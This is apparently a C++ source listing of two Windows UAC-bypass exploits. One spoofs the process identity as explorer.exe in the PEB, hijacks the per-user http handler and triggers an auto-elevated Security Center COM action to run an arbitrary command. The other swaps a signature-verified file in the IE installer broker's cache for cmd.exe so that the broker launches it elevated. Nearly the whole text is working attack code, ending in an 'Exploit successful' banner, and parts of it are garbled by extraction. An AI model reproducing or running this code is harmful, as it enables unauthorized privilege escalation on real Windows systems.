    PCWCHAR ExplorerPath;                       // full path written into the loader entry's FullDllName
    PVOID ImageBase;                            // our own module base, used to pick the right loader entry
    RtlInitUnicodeStringPtr RtlInitUnicodeString;
};

// Minimal vtable-compatible declaration of the COM interface obtained through the
// elevation moniker in Security_Center; only the two methods used here are declared,
// in vtable order after IUnknown.
struct IWscAdmin : IUnknown
{
    virtual HRESULT Initialize(
    ) = 0;

    virtual HRESULT DoModalSecurityAction(
        HWND parentWindow,
        UINT securityAction,
        LONG_PTR unused0
    ) = 0;
};

const GUID IID_IWscAdmin = { 0x49ACAA99, 0xF009, 0x4524, {0x9D, 0x2A, 0xD7, 0x51, 0xC9, 0xA3, 0x8F, 0x60} };

// Function-prologue byte patterns searched for in the .text section (see
// LocateSignature). They identify a specific compiled build of the target
// routine, so a servicing update that changes the prologue makes the scan fail
// (Security_Center then reports "not found" and exits).
const BYTE SIGNATURE_NT10[] = {
    0x48, 0x8B, 0xC4, 0x55, 0x57, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8D, 0x68, 0xA1, 0x48, 0x81, 0xEC, 0xA0,
    0x00, 0x00, 0x00, 0x48, 0xC7, 0x45, 0xEF, 0xFE, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x20
};

const BYTE SIGNATURE_NT6X[] = {
    0x48, 0x89, 0x5C, 0x24, 0x08, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0xFE, 0xFF,
    0xFF, 0x48, 0x81, 0xEC, 0x80, 0x02, 0x00, 0x00
};

// Rewrites the current process's own identity as seen through its PEB so that
// it looks like explorer.exe: ImagePathName and CommandLine in
// RTL_USER_PROCESS_PARAMETERS, plus BaseDllName/FullDllName of the loader entry
// whose DllBase equals our own image base. Nothing on disk changes; only
// readers of the PEB (such as a COM server checking the activating client) see
// the forged names.
//
// explorerPath must stay alive for as long as the forged strings are read:
// per its documentation RtlInitUnicodeString stores the pointer, it does not
// copy the buffer.
//
// NOTE(review): PEB_OFFSET (0x60 from the TEB), PROCESS_PARAM_OFFSET and the
// loader-entry offsets look like the x64 layout; the .vcxproj in this dump also
// has Win32 configurations - confirm this is never built/run as x86.
// An identical copy of this function, ForgeProcessInformation, lives in IIEAdmin.cpp.
void ForgeProcessInformation_sc(PCWCHAR explorerPath, const RtlInitUnicodeStringPtr RtlInitUnicodeString,
    const LdrEnumerateLoadedModulesPtr LdrEnumerateLoadedModules)
{
    auto* const pPeb = *reinterpret_cast(reinterpret_cast(NtCurrentTeb()) + PEB_OFFSET);
    auto* pProcessParams = *reinterpret_cast(pPeb + PROCESS_PARAM_OFFSET);

    RtlInitUnicodeString(&pProcessParams->ImagePathName, explorerPath);
    RtlInitUnicodeString(&pProcessParams->CommandLine, L"explorer.exe");

    LDR_CALLBACK_PARAMS params{ explorerPath, GetModuleHandleW(nullptr), RtlInitUnicodeString };

    // Walk the loader list; the callback matches our own entry by DllBase and stops.
    LdrEnumerateLoadedModules(0, [](PVOID ldrEntry, PVOID context, PBOOLEAN stop)
    {
        auto* params = static_cast(context);

        if (*reinterpret_cast(reinterpret_cast(ldrEntry) + DLL_BASE_OFFSET) == reinterpret_cast<
            ULONG_PTR>(params->ImageBase))
        {
            const auto baseName = reinterpret_cast(static_cast(ldrEntry) + BASENAME_OFFSET),
                fullName = reinterpret_cast(static_cast(ldrEntry) + FULLNAME_OFFSET);

            params->RtlInitUnicodeString(baseName, L"explorer.exe");
            params->RtlInitUnicodeString(fullName, params->ExplorerPath);

            *stop = TRUE;
        }
    }, reinterpret_cast(¶ms));   // extraction artifact: `&params`
}

// Scans the named section of an already-loaded module for `signature` and
// returns the address of the first match (cast to T), or nullptr.
//
// NOTE(review): the section-name loop has no upper bound (NumberOfSections is
// never consulted), so an absent section name walks past the section table.
// NOTE(review): the scan range is built from PointerToRawData, which is the
// section's *file* offset; for a module mapped by LoadLibrary the in-memory
// section start is moduleHandle + VirtualAddress. The two only coincide when
// file and section alignment agree - confirm this holds for the DLLs targeted.
template
T LocateSignature(const BYTE signature[], const int signatureSize, const char* sectionName, const HMODULE moduleHandle)
{
    auto* headers = reinterpret_cast(reinterpret_cast(moduleHandle) + reinterpret_cast<
        PIMAGE_DOS_HEADER>(moduleHandle)->e_lfanew);
    auto* sectionHeader = IMAGE_FIRST_SECTION(headers);

    while (std::strcmp(sectionName, reinterpret_cast(sectionHeader->Name)))
        sectionHeader++;

    for (auto* i = reinterpret_cast(moduleHandle) + sectionHeader->PointerToRawData; i != reinterpret_cast<
        PUCHAR>(moduleHandle) + sectionHeader->PointerToRawData + sectionHeader->SizeOfRawData - signatureSize; i++
        )
    {
        if (std::memcmp(signature, i, signatureSize) == 0)
            return reinterpret_cast(i);
    }

    return reinterpret_cast(nullptr);
}

// Runs `arg` (a command line, narrow string) through the per-user "http" URL
// handler, after spoofing this process's PEB identity to explorer.exe and
// triggering an auto-elevated COM action.
//
// What it does, in order (every step is visible below):
//   1. Reads OS major/minor from the PEB and bails out on 6.0 and older.
//   2. Creates HKCU\SOFTWARE\Classes\scareing\shell\open\command with `arg`
//      as its default value (a ProgId whose open verb is the caller's command).
//   3. Rewrites the PEB so the process presents itself as %WINDIR%\explorer.exe.
//   4. Makes "scareing" the user's "http" association by a version-specific
//      route: 10.0 -> signature-located routine in SystemSettings.Handlers.dll;
//      6.2/6.3 -> signature-located routine in shell32.dll; 6.1 -> direct write
//      of ...\UrlAssociations\http\UserChoice\ProgId.
//   5. Activates the CLSID in the "Elevation:Administrator!new:" moniker
//      (CLSCTX_LOCAL_SERVER), calls Initialize() and DoModalSecurityAction(103),
//      sleeps one second, then deletes the Classes\scareing tree.
//
// Returns 0 on success, EXIT_FAILURE otherwise; every failure path after step 2
// deletes the Classes\scareing tree and calls CoUninitialize().
//
// NOTE(review): the "http" association set in step 4 is never reverted - the
// per-user handler is left pointing at a ProgId that no longer exists after
// step 5's RegDeleteTreeW. Together with the transient Classes\scareing key and
// an elevated activation of that CLSID by a process claiming to be explorer.exe,
// these are the host artifacts this routine leaves.
// NOTE(review): the version gate `osMajorVersion <= 6 && osMinorVersion < 1`
// rejects x.0 only; a 5.x system with minor >= 1 passes it, matches no branch,
// and still reaches the COM activation.
int Security_Center(char* arg)
{
    char* secret = arg;
    //char* secret = argv[1];
    //char* secret = (char*)"notepad.exe";
    auto* hConsole = GetStdHandle(STD_OUTPUT_HANDLE);



    auto* const pPeb = *reinterpret_cast(reinterpret_cast(NtCurrentTeb()) + PEB_OFFSET);
    const auto osMajorVersion = *reinterpret_cast(pPeb + OS_MAJOR_VERSION_OFFSET);
    const auto osMinorVersion = *reinterpret_cast(pPeb + OS_MINOR_VERSION_OFFSET);

    if (osMajorVersion <= 6 && osMinorVersion < 1)
    {
        std::wcout << L"OS not supported.\n";
        return EXIT_FAILURE;
    }

    PWSTR windowsPath, systemPath;
    auto hr = SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &windowsPath);
    if (FAILED(hr))
    {
        std::wcout << L"SHGetKnownFolderPath() (0) failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }
    hr = SHGetKnownFolderPath(FOLDERID_System, 0, nullptr, &systemPath);
    if (FAILED(hr))
    {
        CoTaskMemFree(windowsPath);
        std::wcout << L"SHGetKnownFolderPath() (1) failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    // systemPath is fetched and freed but otherwise unused (the cmd.exe default it fed is commented out).
    //std::wstring explorer{windowsPath}, system32{systemPath};
    std::wstring explorer{ windowsPath };
    CoTaskMemFree(windowsPath);
    CoTaskMemFree(systemPath);
    explorer += L"\\explorer.exe";

    // NOTE(review): both GetProcAddress results are used unchecked.
    const auto RtlInitUnicodeString = reinterpret_cast(GetProcAddress(
        GetModuleHandleW(L"ntdll.dll"), "RtlInitUnicodeString"));
    const auto LdrEnumerateLoadedModules = reinterpret_cast(GetProcAddress(
        GetModuleHandleW(L"ntdll.dll"), "LdrEnumerateLoadedModules"));

    // `explorer` outlives every use of the forged names below (it lives until return).
    ForgeProcessInformation_sc(explorer.c_str(), RtlInitUnicodeString, LdrEnumerateLoadedModules);

    hr = CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY);
    if (FAILED(hr))
    {
        std::wcout << L"CoInitializeEx() failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    // Step 2: the ProgId. HKCU is writable at medium integrity, which is the point.
    HKEY key;
    auto status = RegCreateKeyExW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing\\shell\\open\\command", 0,
        nullptr, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, nullptr, &key, nullptr);
    if (status)
    {
        CoUninitialize();
        std::wcout << L"RegCreateKeyExW() failed. LSTATUS: " << status << std::endl;
        return EXIT_FAILURE;
    }
    //system32 += L"\\cmd.exe";
    //status = RegSetValueExW(key, nullptr, 0, REG_SZ, reinterpret_cast(system32.c_str()),static_cast(system32.size() * sizeof WCHAR + sizeof(L'\0')));
    //DWORD les = 108;
    // Size is in bytes: wcslen * sizeof(WCHAR) plus the terminating L'\0'.
    // NOTE(review): a NULL `arg` yields a NULL `x`, and wcslen(NULL) crashes here.
    bstr_t b(secret);
    WCHAR* x = b;
    status = RegSetValueExW(key, nullptr, 0, REG_SZ, (PBYTE)x, wcslen(x) * 2 + 2);

    RegCloseKey(key);
    if (status)
    {
        RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing");
        CoUninitialize();
        std::wcout << L"RegSetValueExW() failed. LSTATUS: " << status << std::endl;
        return EXIT_FAILURE;
    }

    // Step 4, Windows 10: the association-setting routine is not exported, so
    // it is found by prologue signature and called through a guessed prototype.
    if (osMajorVersion == 10 && osMinorVersion == 0)
    {
        const auto hModule = LoadLibraryExW(L"SystemSettings.Handlers.dll", nullptr,
            LOAD_LIBRARY_SEARCH_SYSTEM32);
        if (!hModule)
        {
            RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing");
            CoUninitialize();
            std::wcout << L"LoadLibraryExW() failed. Error: " << GetLastError() << std::endl;
            return EXIT_FAILURE;
        }

        const auto UserAssocSetInternal = LocateSignature(
            SIGNATURE_NT10, sizeof SIGNATURE_NT10, ".text", hModule);
        if (!UserAssocSetInternal)
        {
            FreeLibrary(hModule);
            RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing");
            CoUninitialize();
            std::wcout << L"SystemSettings.Handlers.dll!UserAssocSet->\"Internal\" not found.\n";
            return EXIT_FAILURE;
        }

        hr = UserAssocSetInternal(nullptr, L"http", L"scareing", 1);
        FreeLibrary(hModule);
        if (FAILED(hr))
        {
            RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing");
            CoUninitialize();
            std::wcout <<
                L"SystemSettings.Handlers.dll!UserAssocSet->\"Internal\" did not return S_OK. Return value -> HRESULT 0x"
                << std::hex << hr << std::endl;
            return EXIT_FAILURE;
        }
    }
    // Step 4, Windows 8 / 8.1: same idea against shell32.dll; this variant has
    // no return value to check.
    else if (osMajorVersion == 6 && (osMinorVersion == 2 || osMinorVersion == 3))
    {
        const auto hModule = LoadLibraryExW(L"shell32.dll", nullptr, LOAD_LIBRARY_SEARCH_SYSTEM32);
        if (!hModule)
        {
            RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing");
            CoUninitialize();
            std::wcout << L"LoadLibraryExW() failed. Error: " << GetLastError() << std::endl;
            return EXIT_FAILURE;
        }

        const auto UserAssocSet = LocateSignature(SIGNATURE_NT6X, sizeof SIGNATURE_NT6X, ".text",
            hModule);
        if (!UserAssocSet)
        {
            FreeLibrary(hModule);
            RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing");
            CoUninitialize();
            std::wcout << L"shell32.dll!UserAssocSet not found.\n";
            return EXIT_FAILURE;
        }

        UserAssocSet(2, L"http", L"scareing");
        FreeLibrary(hModule);
    }
    // Step 4, Windows 7: the UserChoice value is written directly.
    else if (osMajorVersion == 6 && osMinorVersion == 1)
    {
        // NOTE(review): this `status` shadows the function-level one declared above.
        auto status = RegSetKeyValueW(
            HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\http\\UserChoice",
            L"ProgId", REG_SZ, L"scareing", sizeof(L"scareing"));
        if (status)
        {
            RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing");
            CoUninitialize();
            std::wcout << L"RegSetKeyValueW() failed. LSTATUS: " << status << std::endl;
            return EXIT_FAILURE;
        }
    }

    // Step 5: elevated activation through the COM elevation moniker. The
    // forged PEB identity from step 3 is what the activation is meant to see.
    BIND_OPTS3 bind{};
    bind.cbStruct = sizeof BIND_OPTS3;
    bind.dwClassContext = CLSCTX_LOCAL_SERVER;

    IWscAdmin* wscAdmin;
    hr = CoGetObject(L"Elevation:Administrator!new:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}", &bind, IID_IWscAdmin,
        reinterpret_cast(&wscAdmin));
    if (FAILED(hr))
    {
        RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing");
        CoUninitialize();
        std::wcout << L"CoGetObject() failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    hr = wscAdmin->Initialize();
    if (FAILED(hr))
    {
        wscAdmin->Release();
        RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing");
        CoUninitialize();
        // NOTE(review): `hr` is missing from this message - it prints "0x" and a newline only.
        std::wcout << L"CWscAdmin::Initialize() failed. HRESULT: 0x" << std::hex << std::endl;
        return EXIT_FAILURE;
    }

    // The action's result is only inspected after the key has been deleted, so
    // the ProgId exists for exactly the one-second window below.
    hr = wscAdmin->DoModalSecurityAction(nullptr, 103, 0);
    /* Sleep for one second to allow the action to happen, otherwise we'll delete the registry key before it has
     * a chance to read and use it. It's because this action happens async. in another process. I know, its strange
     * but that's how it is. */
    Sleep(1000);
    wscAdmin->Release();
    RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing");
    CoUninitialize();
    if (FAILED(hr))
    {
        std::wcout << L"CWscAdmin::DoModalSecurityAction() failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    // Coloured "[~] *** Exploit successful." banner; attributes 14/15/7 are console colour indices.
    SetConsoleTextAttribute(hConsole, 14);
    std::wcout << L"[";
    SetConsoleTextAttribute(hConsole, 15);
    std::wcout << L"~";
    SetConsoleTextAttribute(hConsole, 14);
    std::wcout << L"] *** Exploit successful.\n\n";
    SetConsoleTextAttribute(hConsole, 7);

    return 0;
}

-------------------------------------------------------------------------------- /IIEAdmin.cpp: --------------------------------------------------------------------------------
#include "IIEAdmin.h"


#pragma region NT Stuff
// Hand-declared copies of undocumented ntdll structures (also declared, identically,
// in Security Center.cpp). Only the fields reached through the offsets below are used.
typedef struct _UNICODE_STRING
{
    unsigned short Length;
    unsigned short MaximumLength;
    long Padding_8;
    wchar_t* Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _CURDIR
{
    struct _UNICODE_STRING DosPath;
    void* Handle;
} CURDIR, * PCURDIR;

typedef struct _STRING
{
    unsigned short Length;
    unsigned short MaximumLength;
    long Padding_94;
    char* Buffer;
} STRING, * PSTRING;

typedef struct _RTL_DRIVE_LETTER_CURDIR
{
    unsigned short Flags;
    unsigned short Length;
    unsigned long TimeStamp;
    struct _STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
// Hand-declared copy of the undocumented RTL_USER_PROCESS_PARAMETERS; of all
// these fields only ImagePathName and CommandLine are written (in
// ForgeProcessInformation below). The Padding_* members and the trailing
// __PADDING__ array exist solely to keep the later fields at the expected
// offsets - NOTE(review): that layout looks like the x64 one and is
// version-dependent; confirm against the builds actually targeted.
typedef struct _RTL_USER_PROCESS_PARAMETERS
{
    unsigned long MaximumLength;
    unsigned long Length;
    unsigned long Flags;
    unsigned long DebugFlags;
    void* ConsoleHandle;
    unsigned long ConsoleFlags;
    long Padding_95;
    void* StandardInput;
    void* StandardOutput;
    void* StandardError;
    struct _CURDIR CurrentDirectory;
    struct _UNICODE_STRING DllPath;
    struct _UNICODE_STRING ImagePathName;
    struct _UNICODE_STRING CommandLine;
    void* Environment;
    unsigned long StartingX;
    unsigned long StartingY;
    unsigned long CountX;
    unsigned long CountY;
    unsigned long CountCharsX;
    unsigned long CountCharsY;
    unsigned long FillAttribute;
    unsigned long WindowFlags;
    unsigned long ShowWindowFlags;
    long Padding_96;
    struct _UNICODE_STRING WindowTitle;
    struct _UNICODE_STRING DesktopInfo;
    struct _UNICODE_STRING ShellInfo;
    struct _UNICODE_STRING RuntimeData;
    struct _RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];
    unsigned __int64 EnvironmentSize;
    unsigned __int64 EnvironmentVersion;
    void* PackageDependencyData;
    unsigned long ProcessGroupId;
    unsigned long LoaderThreads;
    struct _UNICODE_STRING RedirectionDllName;
    struct _UNICODE_STRING HeapPartitionName;
    unsigned __int64* DefaultThreadpoolCpuSetMasks;
    unsigned long DefaultThreadpoolCpuSetMaskCount;
    long __PADDING__[1];
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;

// Raw offsets used by ForgeProcessInformation: PEB_OFFSET is applied to the TEB
// pointer, PROCESS_PARAM_OFFSET to the PEB, and the remaining three to the
// loader entry handed to the LdrEnumerateLoadedModules callback.
constexpr auto PEB_OFFSET = 0x60ULL;
constexpr auto PROCESS_PARAM_OFFSET = 0x20ULL;
constexpr auto BASENAME_OFFSET = 0x58ULL;
constexpr auto FULLNAME_OFFSET = 0x48ULL;
constexpr auto DLL_BASE_OFFSET = 0x30ULL;
#pragma endregion

// NOTE(review): the template arguments of every *_cast in this file were lost
// when the listing was extracted from HTML (only the cast whose `<` was followed
// by a line break survived), and `¶ms` below is `&params`. Read against the
// original source; the code as shown does not compile.
using RtlInitUnicodeStringPtr = void(NTAPI*)(PUNICODE_STRING, PCWSTR);
using LDR_ENUM_CALLBACK = void(NTAPI*)(PVOID, PVOID, PBOOLEAN);
using LdrEnumerateLoadedModulesPtr = NTSTATUS(NTAPI*)(ULONG, LDR_ENUM_CALLBACK, PVOID);

// Context handed to the LdrEnumerateLoadedModules callback in ForgeProcessInformation.
struct LDR_CALLBACK_PARAMS
{
    PCWCHAR ExplorerPath;                       // full path written into the loader entry's FullDllName
    PVOID ImageBase;                            // our own module base, used to pick the right loader entry
    RtlInitUnicodeStringPtr RtlInitUnicodeString;
};

// Rewrites the current process's identity as seen through its PEB so that it
// looks like explorer.exe: ImagePathName and CommandLine in
// RTL_USER_PROCESS_PARAMETERS, plus BaseDllName/FullDllName of the loader
// entry whose DllBase equals our own image base. Nothing on disk changes; only
// code that reads the PEB sees the forged names.
//
// explorerPath must stay alive for as long as the forged strings are read:
// per its documentation RtlInitUnicodeString stores the pointer, it does not
// copy the buffer.
//
// This is a byte-for-byte duplicate of ForgeProcessInformation_sc in
// Security Center.cpp; any fix must be applied to both.
void ForgeProcessInformation(PCWCHAR explorerPath, const RtlInitUnicodeStringPtr RtlInitUnicodeString,
    const LdrEnumerateLoadedModulesPtr LdrEnumerateLoadedModules)
{
    auto* const pPeb = *reinterpret_cast(reinterpret_cast(NtCurrentTeb()) + PEB_OFFSET);
    auto* pProcessParams = *reinterpret_cast(pPeb + PROCESS_PARAM_OFFSET);

    RtlInitUnicodeString(&pProcessParams->ImagePathName, explorerPath);
    RtlInitUnicodeString(&pProcessParams->CommandLine, L"explorer.exe");

    LDR_CALLBACK_PARAMS params{ explorerPath, GetModuleHandleW(nullptr), RtlInitUnicodeString };

    // Walk the loader list; the callback matches our own entry by DllBase and stops.
    LdrEnumerateLoadedModules(0, [](PVOID ldrEntry, PVOID context, PBOOLEAN stop)
    {
        auto* params = static_cast(context);

        if (*reinterpret_cast(reinterpret_cast(ldrEntry) + DLL_BASE_OFFSET) == reinterpret_cast<
            ULONG_PTR>(params->ImageBase))
        {
            const auto baseName = reinterpret_cast(static_cast(ldrEntry) + BASENAME_OFFSET),
                fullName = reinterpret_cast(static_cast(ldrEntry) + FULLNAME_OFFSET);

            params->RtlInitUnicodeString(baseName, L"explorer.exe");
            params->RtlInitUnicodeString(fullName, params->ExplorerPath);

            *stop = TRUE;
        }
    }, reinterpret_cast(¶ms));   // extraction artifact: `&params`
}

// Minimal vtable-compatible declaration of the first broker interface; only the
// one method used is declared, in vtable order after IUnknown.
struct IIEAdminBrokerObjectForAdminInstaller : IUnknown
{
    /**
     * \brief Creates the CActiveXInstallBroker object used by CIEAdminBrokerObject and sets the internal state flag to 1.
     * \param providerName Name of the installer provider to be stored in the object instance.
     * \param unknown0 Some other thing stored in the object instance.
     * \param instanceUuid A unique UUID for this installer session. This must be passed to all methods called in CIEAdminBrokerObject.
* \return Standard HRESULT value.
 */
    virtual HRESULT InitializeAdminInstaller(
        BSTR providerName,
        int unknown0,
        BSTR* instanceUuid
    ) = 0;
};

// IID of IeAxiAdminInstaller, requested from the elevated coclass in IIEAdmin.
const GUID IID_IeAxiAdminInstaller = { 0x9AEA8A59, 0xE0C9, 0x40F1, {0x87, 0xDD, 0x75, 0x70, 0x61, 0xD5, 0x61, 0x77} };

// Hand-written vtable view of the IeAxiInstaller2 interface (obtained via QueryInterface on the object above).
// Method order is the binary contract with the out-of-process object: do not reorder or insert methods.
//
// Security note: VerifyFile is the only gate in front of RunSetupCommand, and what it verifies is a file that it
// then COPIES into the installer cache; RunSetupCommand later executes that cached path. Anything able to rewrite
// the cached copy between the two calls (IIEAdmin does so with an elevated IFileOperation) runs with the broker's
// privileges — a check-then-use gap between signature verification and execution.
struct IIEAdminBrokerObjectForInstaller2 : IUnknown
{
    /**
     * \brief Authorizes a file for execution via RunSetupCommand. WinVerifyTrust is called to check the embedded certificate in the
     * specified file, and if it passes the check, the internal state flag is set to 2, allowing us to use RunSetupCommand. Then, the file
     * is copied into the installer cache directory with a new name. The path for this new file is given to us.
     * \param instanceUuid The installer's instance UUID.
     * \param verifyParentWindow The window to use for WinVerifyTrust (IIEAdmin passes INVALID_HANDLE_VALUE, i.e. no UI).
     * \param unknown0 Needs to be the same as the 'fileName' parameter.
     * \param fileName The file that contains the embedded certificate which we want to verify.
     * \param unknown1 Some unknown parameter (IIEAdmin passes nullptr).
     * \param uiChoice The uiChoice member for the WINTRUST_DATA struct used by WinVerifyTrust.
     * \param uiContext The uiContext member for the WINTRUST_DATA struct used by WinVerifyTrust.
     * \param unknown2 Some interface ID, I just passed in IID_IUnknown. Purpose is unknown.
     * \param verifiedFileName The path for the verified file which has been copied into the installer cache directory.
     *        Returned as a BSTR; the caller releases it with SysFreeString.
     * \param unknown3 Some unknown parameter. [UACME says it's the file's certificate details...]
     * \param unknown4 Some unknown parameter. [UACME says it's the file's certificate details' length/size...]
     *        The returned buffer is released by the caller with CoTaskMemFree (see IIEAdmin).
     * \return Standard HRESULT value.
 */
    virtual HRESULT VerifyFile(
        BSTR instanceUuid,
        HWND verifyParentWindow,
        BSTR unknown0,
        BSTR fileName,
        BSTR unknown1,
        ULONG uiChoice,
        ULONG uiContext,
        REFGUID unknown2,
        BSTR* verifiedFileName,
        PULONG unknown3,
        PUCHAR* unknown4
    ) = 0;

    /**
     * \brief Executes the specified command line. The command line must be a command line of the file path given to us by
     * VerifyFile. Otherwise, the function returns E_ACCESSDENIED. If the command line uses a path as one of the parameters to the
     * executable, the backslashes must be forward slashes, otherwise E_ACCESSDENIED is returned as well (probably because the command line
     * path check fails if a backslash is found after the main executable path). This function basically calls IEAdvpack.dll!RunSetupCommandW.
     * Note that the path check is on the command line TEXT only; the file at that path is not re-verified here, which is what
     * makes the cache swap in IIEAdmin possible.
     * \param instanceUuid The installer's instance UUID.
     * \param parentWindow The parent window to use for IEAdvpack.dll!RunSetupCommandW.
     * \param commandLine The command line to execute.
     * \param infSection The infSection specification for IEAdvpack.dll!RunSetupCommandW.
     * \param workingDirectory The working directory of the process to be launched.
     * \param title The title to use for IEAdvPack.dll!RunSetupCommandW.
     * \param flags A set of flags which tell IEAdvpack.dll!RunSetupCommandW how to handle the setup process: either launch the installer
     * directly or perform an inf-based core install.
     * \param exeHandle A handle to the launched installer, but this will always be NULL in our case.
     * \return E_INVALIDARG on exploit success, otherwise some other unexpected HRESULT value.
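*/
    virtual HRESULT RunSetupCommand(
        BSTR instanceUuid,
        HWND parentWindow,
        BSTR commandLine,
        BSTR infSection,
        BSTR workingDirectory,
        BSTR title,
        ULONG flags,
        PHANDLE exeHandle
    ) = 0;
};

// IID of IeAxiInstaller2, obtained via QueryInterface on the IeAxiAdminInstaller object in IIEAdmin.
const GUID IID_IeAxiInstaller2 = { 0xBC0EC710, 0xA3ED, 0x4F99, {0xB1, 0x4F, 0x5F, 0xD5, 0x9F, 0xDA, 0xCE, 0xA3} };

/**
 * \brief UAC bypass through the auto-elevated Internet Explorer add-on installer broker (ieinstal.exe).
 *
 * Sequence (all of it is in this function):
 *  1. Rewrite this process's PEB/loader strings so it presents itself as %WINDIR%\explorer.exe
 *     (ForgeProcessInformation).
 *  2. Activate an elevated IFileOperation and an elevated IeAxiAdminInstaller through the
 *     "Elevation:Administrator!new:" moniker (CLSCTX_LOCAL_SERVER).
 *  3. VerifyFile() on the signed System32\bdeunlock.exe: the broker signature-checks it and copies it into its
 *     installer cache, returning the cached path.
 *  4. Copy System32\cmd.exe into the current directory under the cached file's exact name, then use the
 *     elevated IFileOperation to delete the cached copy and move the renamed cmd.exe into its place
 *     (the check-then-use gap between VerifyFile and RunSetupCommand).
 *  5. RunSetupCommand("<cached path> /C <arg>") makes the elevated broker launch the swapped cmd.exe.
 *
 * \param arg Command tail for the elevated `cmd.exe /C` (ANSI; converted with bstr_t). Must not be null.
 *            Per the RunSetupCommand notes above, paths inside it need forward slashes, otherwise the broker
 *            returns E_ACCESSDENIED.
 * \return 0 when RunSetupCommand returned E_INVALIDARG (the value observed on a successful launch; see the
 *         interface documentation above). EXIT_FAILURE on any earlier failure, or when RunSetupCommand returned
 *         anything else — previously that case printed a warning and still showed the success banner / returned 0.
 *
 * Side effects and artifacts: a cmd.exe copy is LEFT BEHIND in the broker's installer cache directory (nothing
 * here removes it); a transient copy under the cached file's name is created in the current directory and is
 * moved or deleted before returning; COM is initialised and uninitialised on this thread.
 *
 * Fixes relative to the previous revision: null `arg` (was appended to a std::wstring — undefined behaviour);
 * unchecked GetProcAddress results passed into ForgeProcessInformation; `_wsplitpath_s`/`wcscat_s` into a
 * 25-WCHAR name buffer with ignored errno_t results (the secure CRT treats the overflow as an invalid-parameter
 * fault); raw new[]/delete[] for the staging path; the exit status described above.
 *
 * NOTE(review): preconditions are not checked here — presumably a split-token administrator and a UAC level that
 * still auto-elevates (the Elevation moniker prompts otherwise); a 32-bit build under WOW64 would see the
 * redirected System32. Confirm against the build configuration.
 */
int IIEAdmin(char* arg)
{
    const auto hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE);

    // `arg` becomes the tail of the command line below; appending a null pointer to a std::wstring is UB.
    if (arg == nullptr)
    {
        std::wcout << L"IIEAdmin(): no command line supplied.\n";
        return EXIT_FAILURE;
    }

    PWSTR windowsPath, systemPath;
    auto hr = SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &windowsPath);
    if (FAILED(hr))
    {
        std::wcout << L"SHGetKnownFolderPath() (0) failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }
    hr = SHGetKnownFolderPath(FOLDERID_System, 0, nullptr, &systemPath);
    if (FAILED(hr))
    {
        CoTaskMemFree(windowsPath);
        std::wcout << L"SHGetKnownFolderPath() (1) failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    // Keep the System32 directory separate from the files derived from it (previously one string was reused
    // and the directory re-derived with find()/substr()).
    const std::wstring system32Dir{ systemPath };
    std::wstring explorer{ windowsPath };
    CoTaskMemFree(windowsPath);
    CoTaskMemFree(systemPath);
    explorer += L"\\explorer.exe";

    const auto hNtdll = GetModuleHandleW(L"ntdll.dll");
    const auto RtlInitUnicodeString = reinterpret_cast<RtlInitUnicodeStringPtr>(
        GetProcAddress(hNtdll, "RtlInitUnicodeString"));
    const auto LdrEnumerateLoadedModules = reinterpret_cast<LdrEnumerateLoadedModulesPtr>(
        GetProcAddress(hNtdll, "LdrEnumerateLoadedModules"));
    if (RtlInitUnicodeString == nullptr || LdrEnumerateLoadedModules == nullptr)
    {
        // ForgeProcessInformation calls both through the pointers without checking them.
        std::wcout << L"GetProcAddress() on ntdll.dll failed. Error: " << GetLastError() << std::endl;
        return EXIT_FAILURE;
    }

    // Forge the explorer.exe identity before any elevated activation. The PEB strings alias `explorer`'s
    // buffer from here on, so that local must stay alive for the rest of the function.
    ForgeProcessInformation(explorer.c_str(), RtlInitUnicodeString, LdrEnumerateLoadedModules);

    hr = CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY);
    if (FAILED(hr))
    {
        std::wcout << L"CoInitializeEx() failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }
    // ieinstal.exe calls CoImpersonateClient inside VerifyFile; without an IMPERSONATE-level security blanket on
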